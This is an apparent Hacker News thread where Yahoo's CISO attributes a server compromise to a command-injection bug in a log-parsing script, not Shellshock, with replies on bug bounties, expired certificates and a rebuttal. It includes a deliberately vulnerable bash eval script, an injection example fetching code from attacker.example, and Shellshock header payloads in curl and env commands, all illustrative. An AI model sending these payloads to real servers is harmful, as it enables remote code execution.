
Howdy, Hacker News. I’m the CISO of Yahoo and I wanted to clear up some misconceptions.

Earlier today, we reported that we isolated a handful of servers that were detected to have been impacted by a security flaw. After fully investigating the situation, we found that the servers were in fact not affected by Shellshock.

Three of our Sports API servers had malicious code executed on them this weekend by attackers looking for vulnerable Shellshock servers. These attackers had mutated their exploit, likely with the goal of bypassing IDS/IDP or WAF filters. This mutation happened to exactly fit a command injection bug in a monitoring script our Sports team was using at that moment to parse and debug their web logs.
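
To sketch the bug class (this is a hypothetical log-debugging script for illustration, not the actual code): interpolating a raw, attacker-controlled log field into a string that the shell then evaluates will execute whatever an attacker managed to get logged.

    #!/bin/bash
    # Hypothetical debug script (illustration only, assumes combined log format):
    # count requests per User-Agent by grepping the log for each distinct value.
    # BUG: $agent is attacker-controlled and passed through eval, so a logged
    # value like '"; curl http://attacker.example/x | sh; "' injects commands.
    while read -r agent; do
        eval "grep -c -- \"$agent\" access.log"
    done < <(awk -F'"' '{print $6}' access.log | sort -u)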

Regardless of the cause, our course of action remained the same: to isolate the servers at risk and protect our users' data. The affected API servers are used to provide live game streaming data to our Sports front-end and do not store user data. At this time we have found no evidence that the attackers compromised any other machines or that any user data was affected. This flaw was specific to a small number of machines and has been fixed, and we have added this pattern to our CI/CD code scanners to catch future issues.

As you can imagine this episode caused some confusion in our team, since the servers in question had been successfully patched (twice!!) immediately after the Bash issue became public. Once we ensured that the impacted servers were isolated from the network, we conducted a comprehensive trace of the attack code through our entire stack which revealed the root cause: not Shellshock. Let this be a lesson to defenders and attackers alike: just because exploit code works doesn’t mean it triggered the bug you expected!

I also want to address another issue: Yahoo takes external security reports seriously and we strive to respond immediately to credible tips. We monitor our Bug Bounty (bugbounty.yahoo.com) and security aliases (security@yahoo.com) 24x7, and our records show no attempt by this researcher to contact us using those means. Within an hour of our CEO being emailed directly we had isolated these systems and begun our investigation. We run one of the most successful Bug Bounty programs in the world and I hope everybody here will participate and help us keep our users safe.

We’re always looking for people who want to keep nearly a billion users safe at scale. paranoids-hiring@yahoo-inc.com




>> Yahoo takes external security reports seriously

A few weeks ago, I reported to your team that some of Yahoo's servers' SSL certs were expired. The report was acknowledged, but no one wanted to fix it (until I posted it here and they finally got updated... your site was showing security warnings to your users for 2 weeks).

One of your awesome engineers replied to the expired-SSL-cert issue with: "there do not appear to be any security implications as a direct result of this behavior"


I appreciate you reporting expired certs, which unfortunately happen from time to time. That canned reply is not appropriate and not a reflection of how we approach TLS, and I will get it changed.


>> which unfortunately happen from time to time

How on earth do you manage that? Surely you have a process for monitoring and maintaining them?


Any real third-party certificate authority will let you generate emails to an address of your choice 90, 30, 14, and 3 days before your cert expires (or some similar schedule).

Why wouldn't Yahoo set this up to email the group responsible or a ticketing email?
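
Even without CA reminders, expiry is easy to monitor from the outside; a minimal cron-able sketch (hostname and alert address are placeholders):

    #!/bin/bash
    # Warn if the cert served on port 443 expires within the next 30 days.
    host=www.yahoo.com   # placeholder
    if ! echo | openssl s_client -servername "$host" -connect "$host:443" 2>/dev/null \
           | openssl x509 -noout -checkend $((30*24*3600)); then
        echo "certificate for $host expires within 30 days" \
            | mail -s "cert expiry warning" oncall@example.com   # placeholder address
    fi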


Or you know, create a reminder in Yahoo! Calendar...


People use that??


Does your "successful" bug bounty program still only pay $12.50 in store credit per bug? That could explain the lack of interest in contacting you about any bug at all.


I was curious, so I went to the link secalex posted. Bounties start at $50; the max is $15k.


Admob.com also had an expired SSL cert for a few days recently.


People make mistakes, we all understand (though it is actually quite surprising that Yahoo does not have a mechanism to scan for and monitor expired SSL certs).

That is not the real issue here; the thing is their engineers think an expired SSL cert is okay, so no action was taken. I told them: you are now training your users to feel comfortable with browser warnings when they edit their Yahoo profile, which puts those users at risk from future phishing attacks. I asked why they are not using a self-signed cert if they think an expired SSL cert is okay (of course they didn't reply).

It took raising this in another Hacker News thread on one of their product announcements, which maybe this time made them feel embarrassed enough that they finally fixed it within a day.

The real problem here is actually not the expired SSL cert; it is their mindset. You should treat every little report seriously, and it is your responsibility, because you are running one of the world's largest web sites.


If that's true then... wow, and hopefully there's a new engineering position opening up at Yahoo right now.


Patched twice? There are 7 known Shellshock exploits (and 30 patches) so far... https://shellshocker.net/

Not knocking you or anything; I'm just more interested in whether all the exploits have been patched against than in the number of patches applied.


Before Yahoo poached him to be their CISO, Alex was one of the principals behind iSEC Partners, our former arch-competitor and now sister company. He knows what he's talking about. If he says they're on top of shellshock, my money would be on him being right.

His team also recently poached Chris Rohlf, from his own company no less!, and Chris is probably one of the best vulnerability researchers working.

(I have no affiliation whatsoever with Yahoo and while I like Alex fine, we're not close friends. I'm pretty biased about Chris, though.)

This is more "vote of confidence" than your comment asked for; I'm just heading off a potentially unproductive thread at the pass. :)


This all sounds good - especially given your reputation for infosec.

However, genuine question - how does a layman (like myself) rate infosec specialists? Imagine for a second I'm a senior exec at Target and IBN (IBM's fake arch-competitor) comes to me and says "no worries about security, we use 256-bit encryption, bank grade security, etc etc". Do I believe him?

I feel like infosec is a "I don't know what I don't know" industry and the consequences could be potentially dire.


You essentially can't evaluate that in isolation (looking at their past interactions with the infosec community may help).

It gets better: you can't even depend on the large players generally getting it right. If a large organization makes a bad decision with their first infosec hire, it's not a self-correcting problem - the next hires will be cut from the same cloth, and unless something blows up, almost nobody will know.


If I knew, I'd be a lot wealthier. :|


How much are e.g. SANS certifications worth? I subscribe to their vulnerability emails, but they push the certification programs so hard it smells a little like University of Phoenix.


I can't comment on SANS in particular, but certifications in general tend to be worthless. Receiving a certification tends to be more a matter of persistence than competence. Worse, because the higher quality applicants generally recognize the futility in it, many of them don't participate, which means you can't even assume that someone without the certificate is unqualified.

As far as I can tell the best information provided by a certificate is that you should avoid applicants who brag about them (and for applicants, avoid employers who list them as job qualifications).


I'm not a fan of any security certification.


You make hiring decisions off of a home-grown security "course", right? You've found that valuable -- would others?


That's not an accurate summary of how we hire. We don't make decisions based on the crypto challenges or Microcorruption; we use them to find people to talk to. We have a whole process that actively evaluates candidates.


In some organizations, infosec is just for show. They do it because compliance forces them to do so. In those organizations, the senior execs don't care. They only want to keep the cost down and to comply with audits. They hire managers who do that and mostly rely on legal contracts and agreements to enforce security. When they get hacked, they will pull out the report (or whatever) that states that they are XYZ compliant.


While I don't doubt that infosec is just for show in some places, you can't just say that when they get hacked, they'll just say "We're XYZ compliant" and do nothing else.

The whole point of those audits is to show that, while every company of any importance will eventually have some sort of breach/break-in/hack, the company takes all reasonable steps to prevent it and mitigate the possible effects of such an event.

Infosec isn't a fool-proof thing. There's no way to prevent everything, and all you can do is keep on top of things and take steps to ensure you're doing everything you can to protect your systems.

You WILL get hacked eventually.


Twice means once for the initial bug on Wednesday, the second time with one of the "nuke the attack surface from orbit, it's the only way to be sure" patches that became available that Thursday.

This is no guarantee, of course, which is why the pen-test team that Chris Rohlf runs has to stay abreast of and continuously test the latest available exploits as well as the attempts that we see in our logs.


If you followed some common-sense advice [1], you only needed two patches: the original one as a stop-gap measure for the original RCE on September 24, and Florian's prefix-adding patch that came out shortly thereafter (but has taken some time to appear upstream).

Now, I'm a bit stumped how any obvious variant of the CVE-2014-6271 or CVE-2014-6278 RCE payloads could lead to accidental code execution somewhere else, since they generally produce a parser-breaking syntax error when executed outside an env-encoded function definition. Also, because of an unusual fixed-string prefix required to carry out the attack, there is not a lot you can really do to avoid any half-baked IDS/IPS. Anyway, for the sake of my idle curiosity, I secretly hope that Alex shares the buggy line of code, even though that's unlikely =)

[1] http://lcamtuf.blogspot.com/2014/09/bash-bug-apply-unofficia...
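
The distinction being drawn here is easy to see on the command line (illustrative commands; the first is the widely circulated CVE-2014-6271 test):

    # On an unpatched bash, importing the env-encoded function also runs the trailer:
    env x='() { :; }; echo vulnerable' bash -c 'echo test'
    # vulnerable
    # test

    # The same payload executed directly as shell code is just a parse error:
    bash -c '() { :; }; echo vulnerable'
    # syntax error near unexpected token `('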


There aren't '30 patches' for each system. For CentOS there have been only 2 patches as far as I can tell. Whether all of the issues have been fixed in these patches, I'm not certain. I've also made sure we're using mod_perl instead of CGI Perl.


The 30 patches are the number of total patches on that version of bash (bash's version release cycle is major.minor.patch), not the number of patches related to shellshock.
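
For reference, a quick way to check which patch level a given system is actually running (BASH_VERSINFO is a built-in array holding major, minor, and patch level):

    bash -c 'echo "${BASH_VERSINFO[0]}.${BASH_VERSINFO[1]}.${BASH_VERSINFO[2]}"'
    # e.g. 4.2.53 -> patch level 53; or simply:
    bash --version | head -n1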


I've long had experience with exploits working for the wrong reason, and also the reverse: failing for the wrong reason.

For example, way back in the day before ISS bought my company, somebody claimed their IDS was vulnerable to an IMAP evasion. They actually weren't, but that specific test triggered a wholly separate (and much worse) bug that made it look like it was evadable. I laughed and laughed.


It looks like the guy who originally posted this has pretty much accused you of flat-out lying about this[1]. What do you have to say to his comments, particularly about the sports servers being internal?

[1] - http://www.futuresouth.us/wordpress/?p=25


Yes, the systems with the log parsing bug are part of an internal subnet. As with most web-scale companies, HTTPS requests are terminated on a unified edge and load-balanced to web service hosts in internal clusters. In this case the malicious header was maintained in the backend requests and ended up in the application log, which triggered the command injection. Everything I wrote above is correct and is in no way incompatible with the fact that the affected machines have RFC1918 addresses.
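
In concrete terms, the path looks something like this (hypothetical hostname and log line, assuming a standard reverse-proxy setup that forwards client headers to the backend):

    # Attacker sends a crafted header to the public edge:
    curl -H 'User-Agent: () { :; }; /bin/bash -c "id"' https://sports.yahoo.example/api/game

    # The edge terminates TLS and proxies the request, headers included, to an
    # RFC1918 backend, whose access log then contains the payload, e.g.:
    # 10.1.2.3 - - [06/Oct/2014:...] "GET /api/game HTTP/1.1" 200 512 "-" "() { :; }; /bin/bash -c \"id\""
    # A later log-parsing/debug script with a command-injection bug executes it.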


Thanks for that. Understandably, the presence of an RFC1918 address doesn't necessarily mean a site is inaccessible from the outside, but for everyone else there's no way to tell without poking around Yahoo! which, let's face it, isn't something many of us would condone.


The fact that the API hosts are internal seems to be the bulk of the argument against the validity of the claims here. However, internally addressed application servers behind a public proxy (or proxies) are a fairly common pattern...


If you want hackers to report vulnerabilities to you via the Yahoo Bug Bounty Program, at least pay more than $50 for a minimum bounty; $50 is a joke https://hackerone.com/yahoo ...


That's the minimum bounty. It's what they'll pay for an off-brand CSRF. They'll pay up to $15,000. Wild guess: RCE doesn't get the minimum bounty.


RCE is $3,000 for *.yahoo.com https://hackerone.com/reports/6674. I forgot, they want RCE on https://login.yahoo.com, and then maybe, just maybe, they will pay $15,000.

Thank you


That one single instance, in those circumstances, was $3k. Which (a) is much, much more than $50, and (b) is not bad for a bug that dies the instant the vendor learns about it.


I view bug bounties as more of a conscious nod towards responsible disclosure than anything else. I sincerely doubt anyone could make a competitive living off of bug bounty programs (even accounting for the legal grey area of selling vulnerabilities) so the economic incentive argument seems really silly to me.

In contrast, if you've ever tried to responsibly disclose a vulnerability and gotten a threat from the legal department in response (still common practice in a lot of companies), a bug bounty program can be a very encouraging show of good faith.


We have several participants in our program who are making a pretty decent living, especially the ones for whom a US$5000 reward is comparable to their nation's per-capita GDP. We are hoping to highlight some of these people in a future talk.

I personally think that the opening created for those without the educational or economic opportunities available to developed-world researchers is one of the best side effects of bug bounties.


I think there are quite a few people who do make a living by participating in vulnerability reward programs (well, not at $50 level, obviously).

Now, I have not seen too many people who would be doing it consistently for many years - simply because it gets tiresome. But it's the same thing for security consulting - at most consultancies, pentesters come and go.


$50.00 is a joke, I'm sure they can do better.


Me too. I am sure, too. You know how I'm sure? Because I clicked the link the parent commenter helpfully provided alongside their gripe about Yahoo's bug bounty and read that they do, in fact, do better.


Interesting: I saw the Y debug tool on sports.yahoo.com. It said "Y Confidential" and had a web bug on it and something else in red. It was also on the yahoo.com root domain. I saw this over a few days. Did anyone else see it? I couldn't click on anything, and it was in the lower right-hand corner of the screen.


My opinionated answer to the statement released by Yahoo!:

I won’t sit here and say that I think they are lying. To make such an accusation would only prove me to be a fool not having ammunition in the weapon before I fire it. I will, however, say that I believe – in my opinion – that this is a wordplay and a game of semantics. First off, there are several “shellshock” exploits. The term “shellshock” as the media has portrayed it is to execute the vulnerability or vulnerabilities recently discovered in bash by means of delivering the following payload: () { :; }; <commands>

When we look at this payload, what we are actually seeing is a function definition, not the execution or calling of that function, with regard to the following: () { :; };

The actual "arbitrary code" to be executed lies past that point, where we're no longer defining a function but instead giving instructions to be executed on the operating system via Bash. One could inevitably argue that taking the payload and modifying it to look like () { whatever; }; /bin/bash -c 'id;uname -a' could, or could not, be identified as "shellshock" in the manner in which it was portrayed by the media. However, the fact remains that this "payload" would cause the execution of the commands following the };

When we look at the other SIX (6) payloads that essentially accomplish the exact same thing (https://shellshocker.net), we see that modifying the "payload" does not change the blatant fact that the same underlying results are achieved via the same vulnerable code in the Bash shell.

My response to Yahoo!: please release the UNTAMPERED and UNMODIFIED Apache logs showing the payload delivered to your "sports APIs," and let other researchers, and potentially shareholders, determine what the underlying cause was. Furthermore, to state that this resulted in bypassing your "IDS/IDP" and "WAF filters" makes me wonder exactly what kind of IDS/IDP and WAF filtering you're employing. I'm willing to bet there were exact-phrase-match filters looking for what most sites have identified as the "Shellshock" vulnerability, i.e. "() { :; };", preventing the scripts and/or bash from being executed once that string was identified. That could have been done with something as simple as a wrapper for bash... And considering the IPS/IDS didn't pick up on outbound IRC connections on port(s) 6660 and/or 6667, which NO internal server would have a reason to be connecting to, I can only say that your concept of IDS/IDP is seemingly inadequate, in my professional opinion. So, once again, since the vulnerability has seemingly been "patched," I urge you to release the details of the vulnerability in the script, and also to explain why the initial compromise appears to have been on a web-facing box with public access to it, found amongst a botnet running a Perl script with self-spreading and searching capabilities based around the "shellshock" vulnerability. You are comparing apples and oranges, when in all actuality, you should be comparing "to-may-to" to "to-mah-toh."
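
The exact-phrase-filter point, at least, is easy to demonstrate with a toy example: a filter matching only the canonical string misses trivially mutated variants.

    # A naive fixed-string filter catches the canonical payload but not a variant:
    printf '%s\n' '() { :; }; id' '() { whatever; }; id' | grep -F '() { :; };'
    # () { :; }; id        <- only the first line matches; the variant passes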


> Please issue out the UNTAMPERED and UNMODIFIED apache logs

Who do you think you are? lol.


I'm a shareholder, which makes me an "owner" of a publicly traded company. And who are you?


That's not how it works. You're not privy to the internal operations of Yahoo simply because you own stock. And as regards your role as a security researcher, they're not obligated to disclose logs or, indeed, provide you any detail whatsoever about their security response. They say they've contained the problem, you (presumably) can't still perform the exploit, end of story, unless you have evidence that more servers were compromised than Stamos admits.


Then raise the issue at a shareholder meeting. Owning 2 shares (or 200) won't get you access to logs.


With proper controls, even having 40% of the shares won't get you log files containing user information. Those roles should be separated.


While we are at it, let me go on a little tangent: I have Yahoo Mail for Android, which I use as a dump for my emails, and I get perhaps 100 emails per day. After about 4-6 weeks, the Yahoo Mail app becomes so slow that it is no longer possible to even scroll through emails (on a Nexus 5). I have to clear the Yahoo app's data cache and reconfigure it to make it fast again. Perhaps it's time to take a look at this: when you have things decaying and breaking like that, it encourages hackers to look extra hard for vulnerabilities, since it's a reasonable assumption that other things are neglected, too. I should note that Yahoo's Android mail app is probably the most viable part of the whole Yahoo business now.




